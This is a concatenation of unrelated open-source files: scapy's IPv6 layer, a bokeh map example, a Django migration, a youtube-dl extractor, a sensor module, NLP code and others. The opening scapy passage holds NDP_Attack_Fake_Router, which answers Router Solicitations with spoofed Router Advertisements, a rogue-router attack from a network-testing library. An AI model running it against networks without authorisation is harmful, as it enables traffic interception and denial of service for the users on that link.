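#                                  mac_src_filter="00:13:72:8c:b5:69",
#                                  reply_mac="00:11:22:33:44:55")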
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
ip_src_filter=None):
"""
    The purpose of this function is to send the provided RA message at layer 2
    (i.e. providing a packet starting with IPv6 will not work) in response
    to received RS messages. In the end, the function is a simple wrapper
    around sendp() that monitors the link for RS messages.
It is probably better explained with an example:
>>> ra = Ether()/IPv6()/ICMPv6ND_RA()
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
>>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
>>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
>>> NDP_Attack_Fake_Router(ra, iface="eth0")
Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
...
    The following arguments can be used to change the behavior:
ra: the RA message to send in response to received RS message.
iface: a specific interface (e.g. "eth0") of the system on which the
DoS should be launched. If none is provided, conf.iface is
used.
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
Only RS messages received from this source will trigger a reply.
       Note that no changes to the provided RA are made, which implies that if
you intend to target only the source of the RS using this option,
you will have to set the Ethernet destination address to the same
value in your RA.
The default value for this parameter is None: no filtering on the
source of RS is done.
ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
on. Only RS messages received from this source address will trigger
       replies. The same comment as for the previous argument applies: if
       you use the option, you will probably want to set a specific Ethernet
destination address in the RA.
"""
def is_request(req, mac_src_filter, ip_src_filter):
"""
Check if packet req is a request
"""
if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req):
return 0
mac_src = req[Ether].src
if mac_src_filter and mac_src != mac_src_filter:
return 0
ip_src = req[IPv6].src
if ip_src_filter and ip_src != ip_src_filter:
return 0
return 1
def ra_reply_callback(req, iface):
"""
Callback that sends an RA in reply to an RS
"""
src = req[IPv6].src
sendp(ra, iface=iface, verbose=0)
print("Fake RA sent in response to RS from %s" % src)
if not iface:
iface = conf.iface
sniff_filter = "icmp6"
sniff(store=0,
filter=sniff_filter,
lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
prn=lambda x: ra_reply_callback(x, iface),
iface=iface)
#############################################################################
# Pre-load classes ##
#############################################################################
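# The tables loaded below (icmp6ndoptscls, icmp6typescls, ipv6nhcls) map
# numeric codes to class names given as strings; _load_dict resolves each
# name to the actual class object via globals(), defaulting to Raw when a
# name is not defined in this module.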
def _get_cls(name):
return globals().get(name, Raw)
def _load_dict(d):
for k, v in d.items():
d[k] = _get_cls(v)
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
#############################################################################
#############################################################################
# Layers binding #
#############################################################################
#############################################################################
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501
if WINDOWS:
bind_layers(Loopback, IPv6, type=0x18)
else:
bind_layers(Loopback, IPv6, type=socket.AF_INET6)
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
|
secdev/scapy
|
scapy/layers/inet6.py
|
Python
|
gpl-2.0
| 155,317
|
from __future__ import print_function
from bokeh.util.browser import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.models.glyphs import Circle
from bokeh.models import (
GMapPlot, Range1d, ColumnDataSource, PanTool, WheelZoomTool, BoxSelectTool, GMapOptions)
from bokeh.resources import INLINE
x_range = Range1d()
y_range = Range1d()
# JSON style string taken from: https://snazzymaps.com/style/1/pale-dawn
map_options = GMapOptions(lat=30.2861, lng=-97.7394, map_type="roadmap", zoom=13, styles="""
[{"featureType":"administrative","elementType":"all","stylers":[{"visibility":"on"},{"lightness":33}]},{"featureType":"landscape","elementType":"all","stylers":[{"color":"#f2e5d4"}]},{"featureType":"poi.park","elementType":"geometry","stylers":[{"color":"#c5dac6"}]},{"featureType":"poi.park","elementType":"labels","stylers":[{"visibility":"on"},{"lightness":20}]},{"featureType":"road","elementType":"all","stylers":[{"lightness":20}]},{"featureType":"road.highway","elementType":"geometry","stylers":[{"color":"#c5c6c6"}]},{"featureType":"road.arterial","elementType":"geometry","stylers":[{"color":"#e4d7c6"}]},{"featureType":"road.local","elementType":"geometry","stylers":[{"color":"#fbfaf7"}]},{"featureType":"water","elementType":"all","stylers":[{"visibility":"on"},{"color":"#acbcc9"}]}]
""")
# Google Maps now requires an API key. You can find out how to get one here:
# https://developers.google.com/maps/documentation/javascript/get-api-key
API_KEY = "XXXXXXXXXXX"
plot = GMapPlot(
x_range=x_range, y_range=y_range,
map_options=map_options,
api_key=API_KEY,
)
plot.title.text = "Austin"
source = ColumnDataSource(
data=dict(
lat=[30.2861, 30.2855, 30.2869],
lon=[-97.7394, -97.7390, -97.7405],
fill=['orange', 'blue', 'green']
)
)
circle = Circle(x="lon", y="lat", size=15, fill_color="fill", line_color="black")
plot.add_glyph(source, circle)
pan = PanTool()
wheel_zoom = WheelZoomTool()
box_select = BoxSelectTool()
plot.add_tools(pan, wheel_zoom, box_select)
doc = Document()
doc.add_root(plot)
if __name__ == "__main__":
filename = "maps.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Google Maps Example"))
print("Wrote %s" % filename)
view(filename)
|
phobson/bokeh
|
examples/models/maps.py
|
Python
|
bsd-3-clause
| 2,314
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('umibukela', '0032_auto_20180511_1315'),
]
operations = [
migrations.AddField(
model_name='programme',
name='slug',
field=models.SlugField(max_length=200, unique=True, null=True),
),
]
|
Code4SA/umibukela
|
umibukela/migrations/0033_programme_slug.py
|
Python
|
mit
| 428
|
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
from ..compat import (
compat_b64decode,
compat_str,
)
from ..utils import (
clean_html,
ExtractorError,
int_or_none,
str_or_none,
try_get,
url_or_none,
urlencode_postdata,
urljoin,
)
class PlatziBaseIE(InfoExtractor):
_LOGIN_URL = 'https://platzi.com/login/'
_NETRC_MACHINE = 'platzi'
def _real_initialize(self):
self._login()
def _login(self):
username, password = self._get_login_info()
if username is None:
return
login_page = self._download_webpage(
self._LOGIN_URL, None, 'Downloading login page')
login_form = self._hidden_inputs(login_page)
login_form.update({
'email': username,
'password': password,
})
urlh = self._request_webpage(
self._LOGIN_URL, None, 'Logging in',
data=urlencode_postdata(login_form),
headers={'Referer': self._LOGIN_URL})
# login succeeded
if 'platzi.com/login' not in urlh.geturl():
return
login_error = self._webpage_read_content(
urlh, self._LOGIN_URL, None, 'Downloading login error page')
login = self._parse_json(
self._search_regex(
r'login\s*=\s*({.+?})(?:\s*;|\s*</script)', login_error, 'login'),
None)
for kind in ('error', 'password', 'nonFields'):
error = str_or_none(login.get('%sError' % kind))
if error:
raise ExtractorError(
'Unable to login: %s' % error, expected=True)
raise ExtractorError('Unable to log in')
class PlatziIE(PlatziBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
platzi\.com/clases| # es version
courses\.platzi\.com/classes # en version
)/[^/]+/(?P<id>\d+)-[^/?\#&]+
'''
_TESTS = [{
'url': 'https://platzi.com/clases/1311-next-js/12074-creando-nuestra-primera-pagina/',
'md5': '8f56448241005b561c10f11a595b37e3',
'info_dict': {
'id': '12074',
'ext': 'mp4',
'title': 'Creando nuestra primera página',
'description': 'md5:4c866e45034fc76412fbf6e60ae008bc',
'duration': 420,
},
'skip': 'Requires platzi account credentials',
}, {
'url': 'https://courses.platzi.com/classes/1367-communication-codestream/13430-background/',
'info_dict': {
'id': '13430',
'ext': 'mp4',
'title': 'Background',
'description': 'md5:49c83c09404b15e6e71defaf87f6b305',
'duration': 360,
},
'skip': 'Requires platzi account credentials',
'params': {
'skip_download': True,
},
}]
def _real_extract(self, url):
lecture_id = self._match_id(url)
webpage = self._download_webpage(url, lecture_id)
data = self._parse_json(
self._search_regex(
                # client_data may contain "};" so we have to try the more
                # strict regex first
(r'client_data\s*=\s*({.+?})\s*;\s*\n',
r'client_data\s*=\s*({.+?})\s*;'),
webpage, 'client data'),
lecture_id)
material = data['initialState']['material']
desc = material['description']
title = desc['title']
formats = []
for server_id, server in material['videos'].items():
if not isinstance(server, dict):
continue
for format_id in ('hls', 'dash'):
format_url = url_or_none(server.get(format_id))
if not format_url:
continue
if format_id == 'hls':
formats.extend(self._extract_m3u8_formats(
format_url, lecture_id, 'mp4',
entry_protocol='m3u8_native', m3u8_id=format_id,
note='Downloading %s m3u8 information' % server_id,
fatal=False))
elif format_id == 'dash':
formats.extend(self._extract_mpd_formats(
format_url, lecture_id, mpd_id=format_id,
note='Downloading %s MPD manifest' % server_id,
fatal=False))
self._sort_formats(formats)
content = str_or_none(desc.get('content'))
description = (clean_html(compat_b64decode(content).decode('utf-8'))
if content else None)
duration = int_or_none(material.get('duration'), invscale=60)
return {
'id': lecture_id,
'title': title,
'description': description,
'duration': duration,
'formats': formats,
}
class PlatziCourseIE(PlatziBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:
platzi\.com/clases| # es version
courses\.platzi\.com/classes # en version
)/(?P<id>[^/?\#&]+)
'''
_TESTS = [{
'url': 'https://platzi.com/clases/next-js/',
'info_dict': {
'id': '1311',
'title': 'Curso de Next.js',
},
'playlist_count': 22,
}, {
'url': 'https://courses.platzi.com/classes/communication-codestream/',
'info_dict': {
'id': '1367',
'title': 'Codestream Course',
},
'playlist_count': 14,
}]
@classmethod
def suitable(cls, url):
return False if PlatziIE.suitable(url) else super(PlatziCourseIE, cls).suitable(url)
def _real_extract(self, url):
course_name = self._match_id(url)
webpage = self._download_webpage(url, course_name)
props = self._parse_json(
self._search_regex(r'data\s*=\s*({.+?})\s*;', webpage, 'data'),
course_name)['initialProps']
entries = []
for chapter_num, chapter in enumerate(props['concepts'], 1):
if not isinstance(chapter, dict):
continue
materials = chapter.get('materials')
if not materials or not isinstance(materials, list):
continue
chapter_title = chapter.get('title')
chapter_id = str_or_none(chapter.get('id'))
for material in materials:
if not isinstance(material, dict):
continue
if material.get('material_type') != 'video':
continue
video_url = urljoin(url, material.get('url'))
if not video_url:
continue
entries.append({
'_type': 'url_transparent',
'url': video_url,
'title': str_or_none(material.get('name')),
'id': str_or_none(material.get('id')),
'ie_key': PlatziIE.ie_key(),
'chapter': chapter_title,
'chapter_number': chapter_num,
'chapter_id': chapter_id,
})
course_id = compat_str(try_get(props, lambda x: x['course']['id']))
course_title = try_get(props, lambda x: x['course']['name'], compat_str)
return self.playlist_result(entries, course_id, course_title)
|
vinegret/youtube-dl
|
youtube_dl/extractor/platzi.py
|
Python
|
unlicense
| 7,630
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# pilconfig for pyILPER
#
# (c) 2015 Joachim Siebold
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# pilconfig class -------------------------------------------
#
# Changelog
# 06.10.2015 jsi:
# - class statement syntax update
# 17.09.2016 jsi:
# - open method introduced
# 14.10.2016 jsi:
# - added filename parameter to cls_userconfig
# 17.08.2017 jsi:
# - assign "" to self.add_msg if parameter is none in PilConfigError
# 20.01.2018 jsi
# - added get_dual method
# 12.02.2018 jsi
# - added the clean parameter to the open method
# 12.12.2021 jsi
# - add configversion parameter to open method
#
from .userconfig import cls_userconfig, ConfigError
class PilConfigError(Exception):
def __init__(self,msg,add_msg= None):
self.msg= msg
if add_msg is None:
self.add_msg=""
else:
self.add_msg = add_msg
class cls_pilconfig:
#
# initialize: create instance
#
def __init__(self):
self.__config__= { }
self.__userconfig__ = None
return
#
# open: read in the configuration file into the dictionary
# if the configuration file does not exist, an empty file is created
# If clean is true do not read the config file
#
def open(self,name,configversion,instance,production,clean):
self.__userconfig__= cls_userconfig(name,name,configversion,instance,production)
if clean:
return
try:
self.__config__= self.__userconfig__.read(self.__config__)
except ConfigError as e:
raise PilConfigError(e.msg,e.add_msg)
#
    # Get a key from the configuration dictionary. To initialize a key, a
    # default value can be specified
#
def get(self,name,param,default=None):
pname= name+"_"+param
try:
p= self.__config__[pname]
except KeyError:
if default is None:
raise PilConfigError("configuration parameter not found: "+pname)
else:
self.__config__[pname]= default
p=default
return(p)
#
    # Get a key: first the local key; if its value is -1, fall back to the global key
#
def get_dual(self,name,param):
p = self.get(name,param)
if p == -1:
p = self.get("pyilper",param)
return(p)
#
    # Put a key into the configuration dictionary
#
def put(self,name,param,value):
pname= name+"_"+param
self.__config__[pname]= value
#
# Save the dictionary to the configuration file
#
def save(self):
try:
self.__userconfig__.write(self.__config__)
except ConfigError as e:
raise PilConfigError(e.msg,e.add_msg)
#
# Get the keys of the configuration file
#
def getkeys(self):
return(self.__config__.keys())
#
# remove an entry
#
def remove(self,key):
try:
del(self.__config__[key])
except KeyError:
pass
#
# create config instance
#
PILCONFIG= cls_pilconfig()
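#
# Usage sketch (hypothetical parameter values; see the method definitions
# above for the exact signatures):
#
# PILCONFIG.open("pyilper", "1.6", 0, True, False)
# PILCONFIG.put("pyilper", "papersize", 0)
# size = PILCONFIG.get("pyilper", "papersize", 0)
# PILCONFIG.save()
#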
|
bug400/pyilper
|
pyilper/pilconfig.py
|
Python
|
gpl-2.0
| 3,560
|
class h:
a = 0
b = 1
def __init__(self):
print "hello world"
def sum(self):
return self.a + self.b
def setA(self, a):
self.a = a
def setB(self, b):
self.b = b
v = h()
v.setA(2)
c = v.sum()
print c
|
xu-wang11/Pyww
|
test8.py
|
Python
|
mit
| 254
|
# from electrum_arg.i18n import _
# fullname = 'KeepKey'
# description = _('Provides support for KeepKey hardware wallet')
# requires = [('keepkeylib','github.com/keepkey/python-keepkey')]
# registers_keystore = ('hardware', 'keepkey', _("KeepKey wallet"))
# available_for = ['qt', 'cmdline']
|
argentumproject/electrum-arg
|
plugins/keepkey/__init__.py
|
Python
|
mit
| 294
|
# Copyright (C) 2014, 2015, 2016 SICS Swedish ICT AB
#
# Main author: Tomas Olsson <tol@sics.se>
#
# License: BSD 3 clause
from visisc import _EventHierEle
__author__ = 'tol'
import visisc
import pyisc
class EventHierarchyElement(_EventHierEle):
child_ = None
sibling_ = None
parent_ = None
num_of_children = 0
def __init__(self, name):
'''
        Create an event description that models the relation between an event and other events
        so that a hierarchy of events can be visualised.
:param name: the string "name" is the name of the event.
        (A parent element, in the sense of a more generic event type or a
        grouping of events, is set later via add_child on the parent.)
:return:
'''
_EventHierEle.__init__(self, name, len(name))
def set_index_value(self, severity_level, index0):
'''
Set the index into the data vector (minus any offset) for a severity level
        :param severity_level: an integer >= 0 and < visisc.get_global_num_of_severity_levels() (if only one level exists/is used, it should be set to 0)
        :param index0: the index of the event in the data vector for this event and severity_level
'''
assert severity_level >= 0 and severity_level < visisc.get_global_num_of_severity_levels()
pyisc._set_array_value(self.index, severity_level, index0)
def get_index_value(self, severity_level):
'''
Returns the index into the data vector for a severity level. If not set, it is equal to -1
:param severity_level:
:return: index to severity level
'''
assert severity_level >= 0 and severity_level < visisc.get_global_num_of_severity_levels()
return _EventHierEle.get_index_value(self, severity_level)
def add_child(self,element):
'''
Extends a parent with a child node.
:param element:
:return:
'''
element.parent = self
element.parent_ = self
self.num_of_children += 1
if self.child_ is None:
self.child_ = element
self.child = element
else:
self.child_._add_sibling(element)
def remove_child(self,element):
if self.child_ is None:
return
if self.child_ == element:
element.parent = None
element.parent_ = None
self.child_ = self.child_.sibling_
self.child = self.child.sibling
self.num_of_children -= 1
else:
self.child._remove_sibling(element)
def _add_sibling(self,element):
if self.sibling_ is None:
self.sibling_ = element
self.sibling = element
else:
self.sibling_._add_sibling(element)
def _remove_sibling(self,element):
if self.sibling_ == element:
element.parent = None
element.parent_ = None
self.sibling_ = self.sibling_.sibling_
self.sibling = self.sibling.sibling
self.parent.num_of_children -= 1
else:
self.sibling_._remove_sibling(element)
def to_string(self, level=0):
'''
Turns hierarchy to a string.
:param level:
:return:
'''
str = (" "*level) + self.name
if self.child_ is not None:
str += ":\n"
str += self.child_.to_string(level+1)
if self.sibling_ is not None:
str += "\n"
str += self.sibling_.to_string(level)
return str
def next(self):
'''
        Lets the caller iterate through the whole hierarchy until None is
        returned, beginning with the child and then the siblings.
:return: next element in the hierarchy.
'''
ele = self
if ele.child_ is not None:
return ele.child_
while ele.sibling_ is None and ele.parent_ is not None:
ele = ele.parent_
return ele.sibling_
def __str__(self):
return self.to_string()
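# Usage sketch (hypothetical names; requires the compiled visisc extension,
# since __init__ delegates to _EventHierEle):
#
# root = EventHierarchyElement("root")
# root.add_child(EventHierarchyElement("child_a"))
# root.add_child(EventHierarchyElement("child_b"))
# print(root.to_string())   # "root:" followed by the indented children
# ele = root
# while ele is not None:    # walks children first, then siblings
#     ele = ele.next()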
|
STREAM3/visisc
|
_visisc_modules/EventHierarchy.py
|
Python
|
bsd-3-clause
| 4,104
|
from __future__ import division
import math, random, re
from collections import defaultdict, Counter
from bs4 import BeautifulSoup
import requests
def plot_resumes(plt):
data = [ ("big data", 100, 15), ("Hadoop", 95, 25), ("Python", 75, 50),
("R", 50, 40), ("machine learning", 80, 20), ("statistics", 20, 60),
("data science", 60, 70), ("analytics", 90, 3),
("team player", 85, 85), ("dynamic", 2, 90), ("synergies", 70, 0),
("actionable insights", 40, 30), ("think out of the box", 45, 10),
("self-starter", 30, 50), ("customer focus", 65, 15),
("thought leadership", 35, 35)]
def text_size(total):
"""equals 8 if total is 0, 28 if total is 200"""
return 8 + total / 200 * 20
for word, job_popularity, resume_popularity in data:
plt.text(job_popularity, resume_popularity, word,
ha='center', va='center',
size=text_size(job_popularity + resume_popularity))
plt.xlabel("Popularity on Job Postings")
plt.ylabel("Popularity on Resumes")
plt.axis([0, 100, 0, 100])
plt.show()
#
# n-gram models
#
def fix_unicode(text):
return text.replace(u"\u2019", "'")
def get_document():
url = "http://radar.oreilly.com/2010/06/what-is-data-science.html"
html = requests.get(url).text
soup = BeautifulSoup(html, 'html5lib')
content = soup.find("div", "article-body") # find article-body div
regex = r"[\w']+|[\.]" # matches a word or a period
document = []
for paragraph in content("p"):
words = re.findall(regex, fix_unicode(paragraph.text))
document.extend(words)
return document
def generate_using_bigrams(transitions):
current = "." # this means the next word will start a sentence
result = []
while True:
next_word_candidates = transitions[current] # bigrams (current, _)
current = random.choice(next_word_candidates) # choose one at random
result.append(current) # append it to results
if current == ".": return " ".join(result) # if "." we're done
def generate_using_trigrams(starts, trigram_transitions):
current = random.choice(starts) # choose a random starting word
prev = "." # and precede it with a '.'
result = [current]
while True:
next_word_candidates = trigram_transitions[(prev, current)]
next = random.choice(next_word_candidates)
prev, current = current, next
result.append(current)
if current == ".":
return " ".join(result)
def is_terminal(token):
return token[0] != "_"
def expand(grammar, tokens):
for i, token in enumerate(tokens):
# ignore terminals
if is_terminal(token): continue
# choose a replacement at random
replacement = random.choice(grammar[token])
if is_terminal(replacement):
tokens[i] = replacement
else:
tokens = tokens[:i] + replacement.split() + tokens[(i+1):]
return expand(grammar, tokens)
# if we get here we had all terminals and are done
return tokens
def generate_sentence(grammar):
return expand(grammar, ["_S"])
#
# Gibbs Sampling
#
def roll_a_die():
return random.choice([1,2,3,4,5,6])
def direct_sample():
d1 = roll_a_die()
d2 = roll_a_die()
return d1, d1 + d2
def random_y_given_x(x):
"""equally likely to be x + 1, x + 2, ... , x + 6"""
return x + roll_a_die()
def random_x_given_y(y):
if y <= 7:
# if the total is 7 or less, the first die is equally likely to be
# 1, 2, ..., (total - 1)
return random.randrange(1, y)
else:
# if the total is 7 or more, the first die is equally likely to be
# (total - 6), (total - 5), ..., 6
return random.randrange(y - 6, 7)
def gibbs_sample(num_iters=100):
x, y = 1, 2 # doesn't really matter
for _ in range(num_iters):
x = random_x_given_y(y)
y = random_y_given_x(x)
return x, y
def compare_distributions(num_samples=1000):
counts = defaultdict(lambda: [0, 0])
for _ in range(num_samples):
counts[gibbs_sample()][0] += 1
counts[direct_sample()][1] += 1
return counts
#
# TOPIC MODELING
#
def sample_from(weights):
total = sum(weights)
rnd = total * random.random() # uniform between 0 and total
for i, w in enumerate(weights):
rnd -= w # return the smallest i such that
if rnd <= 0: return i # sum(weights[:(i+1)]) >= rnd
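# e.g. sample_from([1, 1, 3]) returns 2 with probability 3/5,
# and 0 or 1 with probability 1/5 each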
documents = [
["Hadoop", "Big Data", "HBase", "Java", "Spark", "Storm", "Cassandra"],
["NoSQL", "MongoDB", "Cassandra", "HBase", "Postgres"],
["Python", "scikit-learn", "scipy", "numpy", "statsmodels", "pandas"],
["R", "Python", "statistics", "regression", "probability"],
["machine learning", "regression", "decision trees", "libsvm"],
["Python", "R", "Java", "C++", "Haskell", "programming languages"],
["statistics", "probability", "mathematics", "theory"],
["machine learning", "scikit-learn", "Mahout", "neural networks"],
["neural networks", "deep learning", "Big Data", "artificial intelligence"],
["Hadoop", "Java", "MapReduce", "Big Data"],
["statistics", "R", "statsmodels"],
["C++", "deep learning", "artificial intelligence", "probability"],
["pandas", "R", "Python"],
["databases", "HBase", "Postgres", "MySQL", "MongoDB"],
["libsvm", "regression", "support vector machines"]
]
K = 4
document_topic_counts = [Counter()
for _ in documents]
topic_word_counts = [Counter() for _ in range(K)]
topic_counts = [0 for _ in range(K)]
document_lengths = map(len, documents)
distinct_words = set(word for document in documents for word in document)
W = len(distinct_words)
D = len(documents)
def p_topic_given_document(topic, d, alpha=0.1):
"""the fraction of words in document _d_
that are assigned to _topic_ (plus some smoothing)"""
return ((document_topic_counts[d][topic] + alpha) /
(document_lengths[d] + K * alpha))
def p_word_given_topic(word, topic, beta=0.1):
"""the fraction of words assigned to _topic_
that equal _word_ (plus some smoothing)"""
return ((topic_word_counts[topic][word] + beta) /
(topic_counts[topic] + W * beta))
def topic_weight(d, word, k):
"""given a document and a word in that document,
return the weight for the k-th topic"""
return p_word_given_topic(word, k) * p_topic_given_document(k, d)
def choose_new_topic(d, word):
return sample_from([topic_weight(d, word, k)
for k in range(K)])
random.seed(0)
document_topics = [[random.randrange(K) for word in document]
for document in documents]
for d in range(D):
for word, topic in zip(documents[d], document_topics[d]):
document_topic_counts[d][topic] += 1
topic_word_counts[topic][word] += 1
topic_counts[topic] += 1
for iter in range(1000):
for d in range(D):
for i, (word, topic) in enumerate(zip(documents[d],
document_topics[d])):
# remove this word / topic from the counts
# so that it doesn't influence the weights
document_topic_counts[d][topic] -= 1
topic_word_counts[topic][word] -= 1
topic_counts[topic] -= 1
document_lengths[d] -= 1
# choose a new topic based on the weights
new_topic = choose_new_topic(d, word)
document_topics[d][i] = new_topic
# and now add it back to the counts
document_topic_counts[d][new_topic] += 1
topic_word_counts[new_topic][word] += 1
topic_counts[new_topic] += 1
document_lengths[d] += 1
if __name__ == "__main__":
document = get_document()
bigrams = zip(document, document[1:])
transitions = defaultdict(list)
for prev, current in bigrams:
transitions[prev].append(current)
random.seed(0)
print "bigram sentences"
for i in range(10):
print i, generate_using_bigrams(transitions)
print
# trigrams
trigrams = zip(document, document[1:], document[2:])
trigram_transitions = defaultdict(list)
starts = []
for prev, current, next in trigrams:
if prev == ".": # if the previous "word" was a period
starts.append(current) # then this is a start word
trigram_transitions[(prev, current)].append(next)
print "trigram sentences"
for i in range(10):
print i, generate_using_trigrams(starts, trigram_transitions)
print
grammar = {
"_S" : ["_NP _VP"],
"_NP" : ["_N",
"_A _NP _P _A _N"],
"_VP" : ["_V",
"_V _NP"],
"_N" : ["data science", "Python", "regression"],
"_A" : ["big", "linear", "logistic"],
"_P" : ["about", "near"],
"_V" : ["learns", "trains", "tests", "is"]
}
print "grammar sentences"
for i in range(10):
print i, " ".join(generate_sentence(grammar))
print
print "gibbs sampling"
comparison = compare_distributions()
for roll, (gibbs, direct) in comparison.iteritems():
print roll, gibbs, direct
# topic MODELING
for k, word_counts in enumerate(topic_word_counts):
for word, count in word_counts.most_common():
if count > 0: print k, word, count
topic_names = ["Big Data and programming languages",
"Python and statistics",
"databases",
"machine learning"]
for document, topic_counts in zip(documents, document_topic_counts):
print document
for topic, count in topic_counts.most_common():
if count > 0:
print topic_names[topic], count,
print
|
joelgrus/data-science-from-scratch
|
first-edition/code/natural_language_processing.py
|
Python
|
mit
| 10,007
|
import re
import signal
import sys
import time
import Adafruit_DHT
from utils.decorators import in_thread, log_exceptions
from utils.io import non_empty_input, non_empty_positive_numeric_input, log, Color, wrh_input
from wrh_engine import module_base as base_module
ninput = non_empty_input
iinput = non_empty_positive_numeric_input
class DHT22Module(base_module.Module):
"""
This class works with DHT22 temperature and humidity sensor.
Adafruit_Python_DHT package is required by this module.
Installation instructions:
$ git clone https://github.com/adafruit/Adafruit_Python_DHT.git
$ cd Adafruit_Python_DHT
$ sudo python setup.py install
"""
TYPE_NAME = "DHT22 TEMP./HUM. SENSOR"
CONFIGURATION_LINE_PATTERN = "([0-9]{1,9});(.+?);([1-9][0-9]{0,9});([1-9][0-9]{0,9});(.+)$"
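    # A matching configuration line looks like (hypothetical values):
    # "3;Bedroom sensor;4;60;2000" -> id=3, name="Bedroom sensor",
    # gpio pin 4, interval 60 minutes, listening port 2000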
def __init__(self, configuration_file_line=None):
self.last_temperature = self.last_humidity = self.socket = None
self.interval = 60
base_module.Module.__init__(self, configuration_file_line)
@staticmethod
def get_starting_command():
"""
Returns command used to start module as a new process.
:return: Command to be executed when starting new process
"""
return ["/usr/bin/python3.6", "-m", "modules.dht22.dht22"]
def get_configuration_line(self):
"""
Creates module configuration line.
:return: Properly formatted configuration file line
"""
values = (self.id, self.name, self.gpio, self.interval, self.port)
return ('{};' * len(values))[:-1].format(*values)
def _parse_configuration_line(self, configuration_file_line):
"""
Initializes class variables from provided configuration line.
"""
matches = re.search(self.CONFIGURATION_LINE_PATTERN, configuration_file_line)
self.id = int(matches.group(1))
self.name = matches.group(2)
self.gpio = int(matches.group(3))
self.interval = int(matches.group(4))
self.port = matches.group(5)
def get_measurement(self):
"""
Returns two float variables: humidity and temperature.
"""
return Adafruit_DHT.read_retry(Adafruit_DHT.DHT22, self.gpio)
def get_module_description(self):
"""
Returns module description to be viewed by user.
"""
return "DHT22 temperature and humidity sensor"
def run_registration_procedure(self, new_id):
"""
Runs interactive procedure to register new module.
"""
base_module.Module.run_registration_procedure(self, new_id)
self.gpio = iinput("Please input gpio pin number to which sensor is connected: ")
self.interval = iinput("Please input interval (in minutes) for taking consecutive measurements: ")
self.port = iinput("Please input port on which this module will be listening for commands: ")
def edit(self):
"""
        Runs interactive procedure to edit module.
"""
log('Provide new module information (leave fields blank if you don\'t want to change)')
self.name = wrh_input(message='New module\'s name: ', allowed_empty=True) or self.name
self.gpio = iinput("Please input new gpio pin number to which sensor is connected: ",
allowed_empty=True) or self.gpio
self.interval = iinput("Please input new interval (in minutes) for taking consecutive measurements: ",
allowed_empty=True) or self.interval
self.port = iinput("Please input new port on which this module will be listening for commands: ",
allowed_empty=True) or self.port
def start_work(self):
"""
Starts working procedure.
"""
base_module.Module.start_work(self)
self._measurement_thread()
while self._should_end is False:
signal.pause()
def get_html_representation(self, website_host_address):
"""
Returns html code to include in website.
"""
if not self.html_repr:
with open('modules/dht22/html/repr.html', 'r') as f:
html = f.read()
self.html_repr = html.format(id=self.id, name=self.name, port=self.port)
return self.html_repr
@in_thread
@log_exceptions()
def _measurement_thread(self):
while self._should_end is False:
try:
self.last_humidity, self.last_temperature = self.get_measurement()
self._send_measurement({'humidity': self.last_humidity, 'temperature': self.last_temperature})
time.sleep(self.interval * 60)
except AttributeError:
pass
def _react_to_connection(self, connection, _):
if self.last_temperature is not None and self.last_humidity is not None:
connection.send(f'{self.last_humidity:0.1f};{self.last_temperature:0.1f}'.encode('utf-8'))
else:
connection.send('?;?'.encode('utf-8'))
if __name__ == "__main__":
try:
log('DHT22 module: started.')
conf_line = sys.argv[1]
dht22 = DHT22Module(conf_line)
dht22.start_work()
except Exception as e:
log(e, Color.EXCEPTION)
|
Waszker/WRH---Raspberry
|
modules/dht22/dht22.py
|
Python
|
gpl-2.0
| 5,335
|
# vim:ts=4:et
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
